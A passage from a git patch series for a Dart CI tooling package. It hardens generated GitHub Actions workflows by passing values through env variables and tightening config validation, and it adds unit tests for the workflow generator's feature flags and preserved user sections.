"./.runtime_ci/release_notes/v${NEW_VERSION}/" 2>/dev/null || true echo "Found release notes via recursive search: $FOUND" fi fi # Copy release_notes_body.md to /tmp/ for Dart script - if [ -f "./.runtime_ci/release_notes/v${VERSION}/release_notes_body.md" ]; then - cp "./.runtime_ci/release_notes/v${VERSION}/release_notes_body.md" /tmp/release_notes_body.md - elif [ -f "./.runtime_ci/release_notes/v${VERSION}/release_notes.md" ]; then - cp "./.runtime_ci/release_notes/v${VERSION}/release_notes.md" /tmp/release_notes_body.md + if [ -f "./.runtime_ci/release_notes/v${NEW_VERSION}/release_notes_body.md" ]; then + cp "./.runtime_ci/release_notes/v${NEW_VERSION}/release_notes_body.md" /tmp/release_notes_body.md + elif [ -f "./.runtime_ci/release_notes/v${NEW_VERSION}/release_notes.md" ]; then + cp "./.runtime_ci/release_notes/v${NEW_VERSION}/release_notes.md" /tmp/release_notes_body.md fi # List what we found echo "Release notes contents:" - ls -la "./.runtime_ci/release_notes/v${VERSION}/" 2>/dev/null || echo "(empty)" + ls -la "./.runtime_ci/release_notes/v${NEW_VERSION}/" 2>/dev/null || echo "(empty)" # Merge all downloaded audit trail artifacts from different jobs into # a single .runtime_ci/runs/ directory so archive-run can find them. @@ -735,20 +755,25 @@ jobs: # the release. This replaces the old post-release archive that could # never work because .runtime_ci/runs/ didn't exist on the fresh runner. - name: Archive audit trail + env: + NEW_VERSION: ${{ needs.determine-version.outputs.new_version }} run: | dart run runtime_ci_tooling:manage_cicd archive-run \ - --version "${{ needs.determine-version.outputs.new_version }}" + --version "$NEW_VERSION" - name: Create release env: GH_TOKEN: ${{ secrets.TSAVO_AT_PIECES_PERSONAL_ACCESS_TOKEN }} GITHUB_TOKEN: ${{ secrets.TSAVO_AT_PIECES_PERSONAL_ACCESS_TOKEN }} + NEW_VERSION: ${{ needs.determine-version.outputs.new_version }} + PREV_TAG: ${{ needs.determine-version.outputs.prev_tag }} + REPO_NAME: ${{ github.repository }} run: | dart run runtime_ci_tooling:manage_cicd create-release \ - --version "${{ needs.determine-version.outputs.new_version }}" \ - --prev-tag "${{ needs.determine-version.outputs.prev_tag }}" \ + --version "$NEW_VERSION" \ + --prev-tag "$PREV_TAG" \ --artifacts-dir ./artifacts \ - --repo "${{ github.repository }}" + --repo "$REPO_NAME" # ============================================================================ # Job 7: Post-Release Triage @@ -765,12 +790,13 @@ jobs: - name: Configure Git for HTTPS with Token shell: bash + env: + GH_PAT: ${{ secrets.TSAVO_AT_PIECES_PERSONAL_ACCESS_TOKEN || secrets.GITHUB_TOKEN }} run: | - TOKEN="${{ secrets.TSAVO_AT_PIECES_PERSONAL_ACCESS_TOKEN || secrets.GITHUB_TOKEN }}" - git config --global url."https://x-access-token:${TOKEN}@github.com/".insteadOf "git@github.com:" - git config --global url."https://x-access-token:${TOKEN}@github.com/".insteadOf "ssh://git@github.com/" - git config --global url."https://x-access-token:${TOKEN}@github.com/open-runtime/".insteadOf "git@github.com:open-runtime/" - git config --global url."https://x-access-token:${TOKEN}@github.com/pieces-app/".insteadOf "git@github.com:pieces-app/" + git config --global url."https://x-access-token:${GH_PAT}@github.com/".insteadOf "git@github.com:" + git config --global url."https://x-access-token:${GH_PAT}@github.com/".insteadOf "ssh://git@github.com/" + git config --global url."https://x-access-token:${GH_PAT}@github.com/open-runtime/".insteadOf "git@github.com:open-runtime/" + git config --global url."https://x-access-token:${GH_PAT}@github.com/pieces-app/".insteadOf "git@github.com:pieces-app/" - uses: dart-lang/setup-dart@v1.7.1 with: @@ -808,9 +834,11 @@ jobs: env: GEMINI_API_KEY: ${{ secrets.CICD_GEMINI_API_KEY_OPEN_RUNTIME }} GH_TOKEN: ${{ secrets.GITHUB_TOKEN }} + NEW_VERSION: ${{ needs.determine-version.outputs.new_version }} + REPO_NAME: ${{ github.repository }} run: | dart run runtime_ci_tooling:manage_cicd triage post-release \ - --version "${{ needs.determine-version.outputs.new_version }}" \ - --release-tag "v${{ needs.determine-version.outputs.new_version }}" \ - --release-url "https://github.com/${{ github.repository }}/releases/tag/v${{ needs.determine-version.outputs.new_version }}" \ + --version "$NEW_VERSION" \ + --release-tag "v${NEW_VERSION}" \ + --release-url "https://github.com/${REPO_NAME}/releases/tag/v${NEW_VERSION}" \ --manifest /tmp/issue_manifest.json diff --git a/.runtime_ci/template_versions.json b/.runtime_ci/template_versions.json index cb02ab0..627b907 100644 --- a/.runtime_ci/template_versions.json +++ b/.runtime_ci/template_versions.json @@ -1,6 +1,6 @@ { "tooling_version": "0.14.0", - "updated_at": "2026-02-25T00:56:25.768561Z", + "updated_at": "2026-02-25T01:44:16.353491Z", "templates": { "gemini_settings": { "hash": "93983f49dd2f40d2ed245271854946d8916b8f0698ed2cfaf12058305baa0b08", @@ -23,19 +23,19 @@ "updated_at": "2026-02-24T00:59:57.620091Z" }, "workflow_ci": { - "hash": "de1765ea0dff5801a219ba046d25e890155e2ef3cbaa817563125926891aecae", - "consumer_hash": "7e82ac3ccf2e0b584b0797809862cc5c694e5a36923fd78c8565c8bb558eec7b", - "updated_at": "2026-02-25T00:56:25.769334Z" + "hash": "d12b15077608ffdd3b92b21c0a7df520ea38278c0816b82e5925564678e3c59f", + "consumer_hash": "20eb207d18e17e6bb84ce1b19908e8bdca2bf3a26ea8e8c00a09e94c33deb0f2", + "updated_at": "2026-02-25T01:44:16.349990Z" }, "workflow_release": { - "hash": "326627cf41fdeb6cd61dae2fda98599d5815a34e63e4a8af1aaa8f7ad18435d3", - "consumer_hash": "326627cf41fdeb6cd61dae2fda98599d5815a34e63e4a8af1aaa8f7ad18435d3", - "updated_at": "2026-02-24T00:59:57.767027Z" + "hash": "ed0e8fb331d9c3d8827a71d320408d5ff603dcc1449eb2f6ee20b115469e0bd9", + "consumer_hash": "ed0e8fb331d9c3d8827a71d320408d5ff603dcc1449eb2f6ee20b115469e0bd9", + "updated_at": "2026-02-25T01:44:16.352226Z" }, "workflow_issue_triage": { - "hash": "a6364383fd2284c875e765ca183c94c9833248acbfd4ff039372efed8f14f47c", - "consumer_hash": "a6364383fd2284c875e765ca183c94c9833248acbfd4ff039372efed8f14f47c", - "updated_at": "2026-02-24T00:59:57.805191Z" + "hash": "960012c66f7a59ac16ed89d6c7d34244ef1dd16efb6c0a66244431ad49e0f28e", + "consumer_hash": "960012c66f7a59ac16ed89d6c7d34244ef1dd16efb6c0a66244431ad49e0f28e", + "updated_at": "2026-02-25T01:44:16.353504Z" } } } diff --git a/USAGE.md b/USAGE.md index c86bb40..e054296 100644 --- a/USAGE.md +++ b/USAGE.md @@ -1255,7 +1255,7 @@ final exists = await commandExists('git'); 4. **Multi-platform mode** (`ci.platforms` has 2+ entries): - `analyze` — Run analysis once (Ubuntu) - `test` — Run tests as a matrix across OS+arch (`x64` + `arm64`) -5. Optional `web-test` — If `ci.features.web_test=true`, runs `dart test -p chrome` in a standalone Ubuntu job with deterministic Chrome provisioning via `browser-actions/setup-chrome@v2` +5. Optional `web-test` — If `ci.features.web_test=true`, runs `dart test -p chrome` in a standalone Ubuntu job with deterministic Chrome provisioning via SHA-pinned `browser-actions/setup-chrome@v2.1.1` **Platform matrix configuration:** - `ci.platforms`: list of platform IDs (e.g. `["ubuntu-x64","ubuntu-arm64","macos-arm64","macos-x64","windows-x64","windows-arm64"]`) @@ -1263,7 +1263,7 @@ final exists = await commandExists('git'); **Optional features:** - `ci.features.build_runner`: When `true`, runs `dart run build_runner build --delete-conflicting-outputs` before analyze, test, and web-test steps to regenerate `.g.dart` codegen files -- `ci.features.web_test`: When `true`, adds a `web-test` job that provisions Chrome via `browser-actions/setup-chrome@v2` and runs `dart test -p chrome`. Configure via `ci.web_test`: +- `ci.features.web_test`: When `true`, adds a `web-test` job that provisions Chrome via SHA-pinned `browser-actions/setup-chrome@v2.1.1` and runs `dart test -p chrome`. Configure via `ci.web_test`: - `concurrency` (1–32, default `1`): parallel test shards - `paths`: list of relative repo paths (e.g. `["test/web/"]`): paths are normalized, shell-quoted, and validated (no traversal, no shell metacharacters). Empty list = run all tests diff --git a/templates/config.json b/templates/config.json index b5de060..3da8593 100644 --- a/templates/config.json +++ b/templates/config.json @@ -78,8 +78,7 @@ }, "secrets": {}, "sub_packages": [], - "_comment_web_test": "Optional: when features.web_test is true, set web_test to { \"concurrency\": 1, \"paths\": [] } (or leave as {} to use defaults).", - "web_test": {}, + "_comment_web_test": "When features.web_test is true, add web_test: { \"concurrency\": 1, \"paths\": [] } (or {} for defaults).", "_comment_platforms": "Optional: CI platform matrix. When 2+ entries are provided, CI splits into analyze + matrix test jobs.", "platforms": ["ubuntu-x64", "ubuntu-arm64", "macos-arm64", "macos-x64", "windows-x64", "windows-arm64"], "_comment_runner_overrides": "Optional: override platform IDs to custom runs-on labels (e.g. org-managed GitHub-hosted runners). Keys must match ci.platforms entries.", diff --git a/templates/github/workflows/ci.skeleton.yaml b/templates/github/workflows/ci.skeleton.yaml index 939b08c..5abc72c 100644 --- a/templates/github/workflows/ci.skeleton.yaml +++ b/templates/github/workflows/ci.skeleton.yaml @@ -59,7 +59,7 @@ jobs: sdk: "<%dart_sdk%>" - name: Format code - run: dart format --line-length <%line_length%> lib/ + run: dart format --line-length <%line_length%> . - name: Commit and push formatting id: format-push @@ -67,7 +67,7 @@ jobs: if ! git diff --quiet; then git config user.name "github-actions[bot]" git config user.email "41898282+github-actions[bot]@users.noreply.github.com" - git add lib/ + git add -u -- '*.dart' git commit -m "bot(format): apply dart format --line-length <%line_length%> [skip ci]" if git push; then echo "sha=$(git rev-parse HEAD)" >> "$GITHUB_OUTPUT" From e4ad4404f5fa9e5c6b369acfb596abed22e1f7f0 Mon Sep 17 00:00:00 2001 From: Tsavo Knott Date: Tue, 24 Feb 2026 20:49:51 -0500 Subject: [PATCH 09/16] fix: tighten ci config validation rules Enforce uppercase-only secret identifiers and digits-only line_length string values, with corresponding test coverage updates. Include pending workflow template dependency change currently in local working tree. --- lib/src/cli/utils/workflow_generator.dart | 12 ++--- templates/github/workflows/ci.skeleton.yaml | 2 +- test/workflow_generator_test.dart | 53 ++++++++++++++++++++- 3 files changed, 58 insertions(+), 9 deletions(-) diff --git a/lib/src/cli/utils/workflow_generator.dart b/lib/src/cli/utils/workflow_generator.dart index 130ff2c..f2520c5 100644 --- a/lib/src/cli/utils/workflow_generator.dart +++ b/lib/src/cli/utils/workflow_generator.dart @@ -58,9 +58,9 @@ const Set _knownFeatureKeys = { const Set _knownWebTestKeys = {'concurrency', 'paths'}; /// Safe identifier for env vars and GitHub secrets (e.g. API_KEY, GITHUB_TOKEN). -/// Must start with letter or underscore, then alphanumeric/underscore only. +/// Must start with uppercase letter, then uppercase letters, digits, underscores only. bool _isSafeSecretIdentifier(String s) { - return RegExp(r'^[A-Za-z_][A-Za-z0-9_]*$').hasMatch(s); + return RegExp(r'^[A-Z][A-Z0-9_]*$').hasMatch(s); } /// Runner label must not contain newlines, control chars, or YAML-injection chars. @@ -415,11 +415,11 @@ class WorkflowGenerator { errors.add('ci.line_length must not have leading/trailing whitespace'); } else if (lineLength.contains(RegExp(r'[\r\n\t\x00-\x1f]'))) { errors.add('ci.line_length must not contain newlines or control characters'); + } else if (!RegExp(r'^\d+$').hasMatch(lineLength)) { + errors.add('ci.line_length string must be digits only (e.g. 120), got "$lineLength"'); } else { - final parsed = int.tryParse(lineLength); - if (parsed == null) { - errors.add('ci.line_length string must be numeric, got "$lineLength"'); - } else if (parsed < 1 || parsed > 10000) { + final parsed = int.parse(lineLength); + if (parsed < 1 || parsed > 10000) { errors.add('ci.line_length must be between 1 and 10000, got $lineLength'); } } diff --git a/templates/github/workflows/ci.skeleton.yaml b/templates/github/workflows/ci.skeleton.yaml index 5abc72c..a85058a 100644 --- a/templates/github/workflows/ci.skeleton.yaml +++ b/templates/github/workflows/ci.skeleton.yaml @@ -458,7 +458,7 @@ jobs: <%/multi_platform%> <%#web_test%> web-test: - needs: [pre-check<%#format_check%>, auto-format<%/format_check%><%#single_platform%>, analyze-and-test<%/single_platform%><%#multi_platform%>, analyze<%/multi_platform%>] + needs: [pre-check<%#format_check%>, auto-format<%/format_check%><%#multi_platform%>, analyze<%/multi_platform%>] if: needs.pre-check.outputs.should_run == 'true' runs-on: ubuntu-latest <%#has_secrets%> diff --git a/test/workflow_generator_test.dart b/test/workflow_generator_test.dart index 2b0c8a9..a793b3f 100644 --- a/test/workflow_generator_test.dart +++ b/test/workflow_generator_test.dart @@ -299,6 +299,27 @@ void main() { ); expect(errors.where((e) => e.contains('secrets')), isEmpty); }); + + test('secrets key with leading underscore produces error (must start with uppercase letter)', () { + final errors = WorkflowGenerator.validate( + _validConfig(secrets: {'_API_KEY': 'MY_SECRET'}), + ); + expect(errors, anyElement(contains('safe identifier'))); + }); + + test('secrets key with lowercase produces error (uppercase only)', () { + final errors = WorkflowGenerator.validate( + _validConfig(secrets: {'api_key': 'MY_SECRET'}), + ); + expect(errors, anyElement(contains('safe identifier'))); + }); + + test('secrets value with lowercase produces error (uppercase only)', () { + final errors = WorkflowGenerator.validate( + _validConfig(secrets: {'API_KEY': 'my_secret'}), + ); + expect(errors, anyElement(contains('safe secret name'))); + }); }); // ---- personal_access_token_secret ---- @@ -354,6 +375,20 @@ void main() { isEmpty, ); }); + + test('pat with leading underscore produces error (must start with uppercase letter)', () { + final errors = WorkflowGenerator.validate( + _validConfig(pat: '_MY_PAT'), + ); + expect(errors, anyElement(contains('safe identifier'))); + }); + + test('pat with lowercase produces error (uppercase only)', () { + final errors = WorkflowGenerator.validate( + _validConfig(pat: 'my_pat'), + ); + expect(errors, anyElement(contains('safe identifier'))); + }); }); // ---- line_length ---- @@ -382,11 +417,25 @@ void main() { expect(errors.where((e) => e.contains('line_length')), isEmpty); }); - test('string line_length "abc" produces error (must be numeric)', () { + test('string line_length "abc" produces error (must be digits only)', () { final errors = WorkflowGenerator.validate( _validConfig(lineLength: 'abc'), ); - expect(errors, anyElement(contains('must be numeric'))); + expect(errors, anyElement(contains('digits only'))); + }); + + test('string line_length "+120" produces error (digits only, no sign)', () { + final errors = WorkflowGenerator.validate( + _validConfig(lineLength: '+120'), + ); + expect(errors, anyElement(contains('digits only'))); + }); + + test('string line_length "-120" produces error (digits only, no sign)', () { + final errors = WorkflowGenerator.validate( + _validConfig(lineLength: '-120'), + ); + expect(errors, anyElement(contains('digits only'))); }); test('string line_length with leading/trailing whitespace produces error', From d017a209771a73f38103335276b379643ea01f63 Mon Sep 17 00:00:00 2001 From: Tsavo Knott Date: Tue, 24 Feb 2026 20:51:51 -0500 Subject: [PATCH 10/16] test: add _preserveUserSections edge cases and feature flag combination tests - Add 6 _preserveUserSections tests: unknown section name, missing END marker, mismatched BEGIN/END names, regex-special characters in content, null existingContent, unrelated existingContent - Add 13 feature flag combination tests: format_check+web_test, build_runner+web_test, proto+web_test, multi-platform+web_test, single-platform+web_test (no analyze-and-test dep), secrets in web-test, lfs+web_test, managed_test in multi-platform, all features enabled, no features enabled, sub_packages render, runner_overrides - Total: 240 tests, all passing Co-Authored-By: Claude Opus 4.6 --- test/workflow_generator_test.dart | 312 ++++++++++++++++++++++++++++++ 1 file changed, 312 insertions(+) diff --git a/test/workflow_generator_test.dart b/test/workflow_generator_test.dart index a793b3f..e00ed8e 100644 --- a/test/workflow_generator_test.dart +++ b/test/workflow_generator_test.dart @@ -1725,6 +1725,318 @@ void main() { // post-test: real content was preserved expect(rendered, contains('echo kept')); }); + + test('unknown section name in existing content is silently ignored', () { + final gen = WorkflowGenerator( + ciConfig: _minimalValidConfig(), + toolingVersion: '0.0.0-test', + ); + final base = gen.render(); + // Add a user section that doesn't exist in the skeleton + final existing = '$base\n# --- BEGIN USER: nonexistent ---\n custom: stuff\n# --- END USER: nonexistent ---\n'; + final rendered = gen.render(existingContent: existing); + // The unknown section content should not appear in the rendered output + // (there's no matching placeholder to insert it into) + expect(rendered, isNot(contains('custom: stuff'))); + // Known sections still render correctly + expect(rendered, contains('# --- BEGIN USER: pre-test ---')); + }); + + test('malformed section markers (missing END) are ignored', () { + final gen = WorkflowGenerator( + ciConfig: _minimalValidConfig(), + toolingVersion: '0.0.0-test', + ); + final base = gen.render(); + // Inject a BEGIN without matching END — regex won't match, so it's ignored + final existing = base.replaceFirst( + '# --- BEGIN USER: pre-test ---\n# --- END USER: pre-test ---', + '# --- BEGIN USER: pre-test ---\n - run: echo orphan\n', + ); + final rendered = gen.render(existingContent: existing); + // The orphaned content won't be extracted (regex requires matched pair) + expect(rendered, isNot(contains('echo orphan'))); + }); + + test('mismatched section names (BEGIN X / END Y) are ignored', () { + final gen = WorkflowGenerator( + ciConfig: _minimalValidConfig(), + toolingVersion: '0.0.0-test', + ); + final base = gen.render(); + final existing = base.replaceFirst( + '# --- BEGIN USER: pre-test ---\n# --- END USER: pre-test ---', + '# --- BEGIN USER: pre-test ---\n - run: echo mismatch\n# --- END USER: post-test ---', + ); + final rendered = gen.render(existingContent: existing); + // Mismatched names: regex backreference \1 won't match, so nothing extracted + expect(rendered, isNot(contains('echo mismatch'))); + }); + + test('section content with regex-special characters is preserved verbatim', () { + final gen = WorkflowGenerator( + ciConfig: _minimalValidConfig(), + toolingVersion: '0.0.0-test', + ); + final base = gen.render(); + // Content with regex special chars: $, (), *, +, ?, |, ^, {, } + const specialContent = r' - run: echo "${{ matrix.os }}" && test [[ "$(whoami)" == "ci" ]]'; + final existing = base.replaceFirst( + '# --- BEGIN USER: pre-test ---\n# --- END USER: pre-test ---', + '# --- BEGIN USER: pre-test ---\n$specialContent\n# --- END USER: pre-test ---', + ); + final rendered = gen.render(existingContent: existing); + expect(rendered, contains(specialContent)); + }); + + test('null existingContent produces same output as no existingContent', () { + final gen = WorkflowGenerator( + ciConfig: _minimalValidConfig(), + toolingVersion: '0.0.0-test', + ); + final withoutExisting = gen.render(); + final withNull = gen.render(existingContent: null); + expect(withNull, equals(withoutExisting)); + }); + + test('existingContent with no user sections produces same output as fresh render', () { + final gen = WorkflowGenerator( + ciConfig: _minimalValidConfig(), + toolingVersion: '0.0.0-test', + ); + final fresh = gen.render(); + // Use a completely unrelated string as existing content + final rendered = gen.render(existingContent: 'name: SomeOtherWorkflow\non: push'); + expect(rendered, equals(fresh)); + }); + }); + + // ---- render() feature flag combinations ---- + group('feature flag combinations', () { + test('format_check + web_test: web-test needs includes auto-format', () { + final gen = WorkflowGenerator( + ciConfig: _minimalValidConfig( + webTest: true, + featureOverrides: {'format_check': true}, + ), + toolingVersion: '0.0.0-test', + ); + final rendered = gen.render(); + final parsed = loadYaml(rendered) as YamlMap; + final webTestJob = parsed['jobs']['web-test'] as YamlMap; + final needs = (webTestJob['needs'] as YamlList).toList(); + expect(needs, contains('pre-check')); + expect(needs, contains('auto-format')); + }); + + test('web_test without format_check: web-test needs omits auto-format', () { + final gen = WorkflowGenerator( + ciConfig: _minimalValidConfig(webTest: true), + toolingVersion: '0.0.0-test', + ); + final rendered = gen.render(); + final parsed = loadYaml(rendered) as YamlMap; + final webTestJob = parsed['jobs']['web-test'] as YamlMap; + final needs = (webTestJob['needs'] as YamlList).toList(); + expect(needs, contains('pre-check')); + expect(needs, isNot(contains('auto-format'))); + }); + + test('build_runner + web_test: web-test job contains build_runner step', () { + final gen = WorkflowGenerator( + ciConfig: _minimalValidConfig( + webTest: true, + featureOverrides: {'build_runner': true}, + ), + toolingVersion: '0.0.0-test', + ); + final rendered = gen.render(); + // Find the web-test job section and check it contains build_runner + final webTestStart = rendered.indexOf('web-test:'); + expect(webTestStart, isNot(-1)); + final afterWebTest = rendered.substring(webTestStart); + expect(afterWebTest, contains('Run build_runner')); + }); + + test('proto + web_test: web-test job contains proto steps', () { + final gen = WorkflowGenerator( + ciConfig: _minimalValidConfig( + webTest: true, + featureOverrides: {'proto': true}, + ), + toolingVersion: '0.0.0-test', + ); + final rendered = gen.render(); + final webTestStart = rendered.indexOf('web-test:'); + expect(webTestStart, isNot(-1)); + final afterWebTest = rendered.substring(webTestStart); + expect(afterWebTest, contains('Install protoc')); + expect(afterWebTest, contains('Verify proto files')); + }); + + test('multi-platform + web_test: web-test depends on analyze (not test)', () { + final gen = WorkflowGenerator( + ciConfig: _minimalValidConfig( + webTest: true, + platforms: ['ubuntu', 'macos'], + ), + toolingVersion: '0.0.0-test', + ); + final rendered = gen.render(); + final parsed = loadYaml(rendered) as YamlMap; + final webTestJob = parsed['jobs']['web-test'] as YamlMap; + final needs = (webTestJob['needs'] as YamlList).toList(); + expect(needs, contains('analyze')); + expect(needs, isNot(contains('test'))); + expect(needs, isNot(contains('analyze-and-test'))); + }); + + test('single-platform + web_test: web-test does not depend on analyze-and-test', () { + final gen = WorkflowGenerator( + ciConfig: _minimalValidConfig( + webTest: true, + platforms: ['ubuntu'], + ), + toolingVersion: '0.0.0-test', + ); + final rendered = gen.render(); + final parsed = loadYaml(rendered) as YamlMap; + final webTestJob = parsed['jobs']['web-test'] as YamlMap; + final needs = (webTestJob['needs'] as YamlList).toList(); + expect(needs, contains('pre-check')); + expect(needs, isNot(contains('analyze-and-test'))); + }); + + test('secrets render in web-test job env block', () { + final gen = WorkflowGenerator( + ciConfig: _minimalValidConfig(webTest: true) + ..['secrets'] = {'API_KEY': 'MY_SECRET'}, + toolingVersion: '0.0.0-test', + ); + final rendered = gen.render(); + final webTestStart = rendered.indexOf('web-test:'); + expect(webTestStart, isNot(-1)); + final afterWebTest = rendered.substring(webTestStart); + expect(afterWebTest, contains('API_KEY')); + expect(afterWebTest, contains('MY_SECRET')); + }); + + test('lfs + web_test: web-test checkout has lfs: true', () { + final gen = WorkflowGenerator( + ciConfig: _minimalValidConfig( + webTest: true, + featureOverrides: {'lfs': true}, + ), + toolingVersion: '0.0.0-test', + ); + final rendered = gen.render(); + final webTestStart = rendered.indexOf('web-test:'); + expect(webTestStart, isNot(-1)); + final afterWebTest = rendered.substring(webTestStart); + expect(afterWebTest, contains('lfs: true')); + }); + + test('managed_test in multi-platform: test job uses managed test command', () { + final gen = WorkflowGenerator( + ciConfig: _minimalValidConfig( + featureOverrides: {'managed_test': true}, + platforms: ['ubuntu', 'macos'], + ), + toolingVersion: '0.0.0-test', + ); + final rendered = gen.render(); + final parsed = loadYaml(rendered) as YamlMap; + final testJob = parsed['jobs']['test'] as YamlMap; + final steps = (testJob['steps'] as YamlList).toList(); + final testStep = steps.firstWhere( + (s) => s is YamlMap && s['name'] == 'Test', + orElse: () => null, + ); + expect(testStep, isNotNull); + expect((testStep as YamlMap)['run'], contains('manage_cicd test')); + }); + + test('all features enabled renders valid YAML', () { + final gen = WorkflowGenerator( + ciConfig: _minimalValidConfig( + webTest: true, + webTestConfig: {'concurrency': 4, 'paths': ['test/web/']}, + featureOverrides: { + 'proto': true, + 'lfs': true, + 'format_check': true, + 'analysis_cache': true, + 'managed_analyze': true, + 'managed_test': true, + 'build_runner': true, + }, + platforms: ['ubuntu', 'macos'], + )..['secrets'] = {'API_KEY': 'MY_SECRET'}, + toolingVersion: '0.0.0-test', + ); + final rendered = gen.render(); + // Must parse as valid YAML + final parsed = loadYaml(rendered) as YamlMap; + final jobs = parsed['jobs'] as YamlMap; + expect(jobs.containsKey('pre-check'), isTrue); + expect(jobs.containsKey('auto-format'), isTrue); + expect(jobs.containsKey('analyze'), isTrue); + expect(jobs.containsKey('test'), isTrue); + expect(jobs.containsKey('web-test'), isTrue); + // web-test should have Chrome setup + final webTestSteps = (jobs['web-test']['steps'] as YamlList).toList(); + final chromeStep = webTestSteps.firstWhere( + (s) => s is YamlMap && s['name'] == 'Setup Chrome', + orElse: () => null, + ); + expect(chromeStep, isNotNull); + }); + + test('no features enabled (all false) renders minimal valid YAML', () { + final gen = WorkflowGenerator( + ciConfig: _minimalValidConfig(), + toolingVersion: '0.0.0-test', + ); + final rendered = gen.render(); + final parsed = loadYaml(rendered) as YamlMap; + final jobs = parsed['jobs'] as YamlMap; + expect(jobs.containsKey('pre-check'), isTrue); + expect(jobs.containsKey('analyze-and-test'), isTrue); + expect(jobs.containsKey('auto-format'), isFalse); + expect(jobs.containsKey('web-test'), isFalse); + // Should NOT contain feature-gated content + expect(rendered, isNot(contains('Install protoc'))); + expect(rendered, isNot(contains('lfs: true'))); + expect(rendered, isNot(contains('auto-format'))); + expect(rendered, isNot(contains('Run build_runner'))); + }); + + test('sub_packages render in single-platform job', () { + final gen = WorkflowGenerator( + ciConfig: _minimalValidConfig() + ..['sub_packages'] = [ + {'name': 'core', 'path': 'packages/core'}, + {'name': 'api', 'path': 'packages/api'}, + ], + toolingVersion: '0.0.0-test', + ); + final rendered = gen.render(); + expect(rendered, contains('Analyze (core)')); + expect(rendered, contains('Analyze (api)')); + expect(rendered, contains('working-directory: packages/core')); + expect(rendered, contains('working-directory: packages/api')); + }); + + test('runner_overrides change runs-on in single-platform', () { + final gen = WorkflowGenerator( + ciConfig: _minimalValidConfig()..['runner_overrides'] = {'ubuntu': 'my-custom-runner'}, + toolingVersion: '0.0.0-test', + ); + final rendered = gen.render(); + final parsed = loadYaml(rendered) as YamlMap; + final job = parsed['jobs']['analyze-and-test'] as YamlMap; + expect(job['runs-on'], equals('my-custom-runner')); + }); }); }); } From cf410deb645f73338743b5629682d872430309b6 Mon Sep 17 00:00:00 2001 From: Tsavo Knott Date: Tue, 24 Feb 2026 21:13:45 -0500 Subject: [PATCH 11/16] fix: harden CI workflow generation and test execution paths This addresses the consolidated review findings by improving process/stream robustness, summary safety and parsing limits, and workflow template correctness across platform dependencies, artifact policy, and cache paths. It also adds focused regression tests for test-command behavior, summary edge cases, and workflow rendering contracts. --- .github/workflows/ci.yaml | 11 +- .github/workflows/issue-triage.yaml | 2 +- .github/workflows/release.yaml | 16 +- .runtime_ci/template_versions.json | 20 +- bin/manage_cicd.dart | 3 +- lib/src/cli/commands/test_command.dart | 303 +++++- lib/src/cli/manage_cicd.dart | 4 +- lib/src/cli/utils/exit_util.dart | 13 + lib/src/cli/utils/step_summary.dart | 18 +- lib/src/cli/utils/test_results_util.dart | 95 +- lib/src/cli/utils/workflow_generator.dart | 4 + templates/github/workflows/ci.skeleton.yaml | 32 +- .../workflows/issue-triage.template.yaml | 2 +- .../github/workflows/release.template.yaml | 16 +- test/cli_utils_test.dart | 347 ++++--- test/test_command_test.dart | 97 ++ test/workflow_generator_test.dart | 957 +++++++----------- 17 files changed, 1102 insertions(+), 838 deletions(-) create mode 100644 lib/src/cli/utils/exit_util.dart create mode 100644 test/test_command_test.dart diff --git a/.github/workflows/ci.yaml b/.github/workflows/ci.yaml index b32b0e0..debb562 100644 --- a/.github/workflows/ci.yaml +++ b/.github/workflows/ci.yaml @@ -1,5 +1,6 @@ # Generated by runtime_ci_tooling v0.14.0 # Configured via .runtime_ci/config.json — run 'dart run runtime_ci_tooling:manage_cicd update --workflows' to regenerate. +# Policy: test artifact retention-days = 7 (applied consistently). name: CI on: @@ -106,10 +107,11 @@ jobs: sdk: "3.9.2" # ── shared:pub-cache ── keep in sync with single_platform ── + # Windows: %LOCALAPPDATA%\Pub\Cache (Dart default). Unix: ~/.pub-cache - name: Cache Dart pub dependencies uses: actions/cache@v5.0.3 with: - path: ~/.pub-cache + path: ${{ runner.os == 'Windows' && format('{0}\\Pub\\Cache', env.LOCALAPPDATA) || '~/.pub-cache' }} key: ${{ runner.os }}-${{ runner.arch }}-dart-pub-${{ hashFiles('**/pubspec.yaml') }} restore-keys: ${{ runner.os }}-${{ runner.arch }}-dart-pub- @@ -167,10 +169,11 @@ jobs: sdk: "3.9.2" # ── shared:pub-cache ── keep in sync with single_platform ── + # Windows: %LOCALAPPDATA%\Pub\Cache (Dart default). Unix: ~/.pub-cache - name: Cache Dart pub dependencies uses: actions/cache@v5.0.3 with: - path: ~/.pub-cache + path: ${{ runner.os == 'Windows' && format('{0}\\Pub\\Cache', env.LOCALAPPDATA) || '~/.pub-cache' }} key: ${{ runner.os }}-${{ runner.arch }}-dart-pub-${{ hashFiles('**/pubspec.yaml') }} restore-keys: ${{ runner.os }}-${{ runner.arch }}-dart-pub- @@ -198,7 +201,7 @@ jobs: PLATFORM_ID: ${{ matrix.platform_id }} - name: Upload test logs - if: always() + if: success() || failure() uses: actions/upload-artifact@v4 with: name: test-logs-${{ matrix.platform_id }} @@ -206,7 +209,7 @@ jobs: ${{ runner.temp }}/test-logs/ test/integration/fixtures/bin/ **/test-results/ - retention-days: 14 + retention-days: 7 # --- BEGIN USER: post-test --- # --- END USER: post-test --- diff --git a/.github/workflows/issue-triage.yaml b/.github/workflows/issue-triage.yaml index 3924e03..f632fc7 100644 --- a/.github/workflows/issue-triage.yaml +++ b/.github/workflows/issue-triage.yaml @@ -67,7 +67,7 @@ jobs: if: steps.trigger.outputs.run == 'true' uses: actions/cache@v5.0.3 with: - path: ~/.pub-cache + path: ${{ runner.os == 'Windows' && format('{0}/Pub/Cache', env.LOCALAPPDATA) || '~/.pub-cache' }} key: ${{ runner.os }}-dart-pub-${{ hashFiles('**/pubspec.yaml') }} restore-keys: ${{ runner.os }}-dart-pub- diff --git a/.github/workflows/release.yaml b/.github/workflows/release.yaml index 1f693b9..c13875b 100644 --- a/.github/workflows/release.yaml +++ b/.github/workflows/release.yaml @@ -84,7 +84,7 @@ jobs: - name: Cache Dart pub dependencies uses: actions/cache@v5.0.3 with: - path: ~/.pub-cache + path: ${{ runner.os == 'Windows' && format('{0}/Pub/Cache', env.LOCALAPPDATA) || '~/.pub-cache' }} key: ${{ runner.os }}-dart-pub-${{ hashFiles('**/pubspec.yaml') }} restore-keys: ${{ runner.os }}-dart-pub- @@ -158,7 +158,7 @@ jobs: - name: Cache Dart pub dependencies uses: actions/cache@v5.0.3 with: - path: ~/.pub-cache + path: ${{ runner.os == 'Windows' && format('{0}/Pub/Cache', env.LOCALAPPDATA) || '~/.pub-cache' 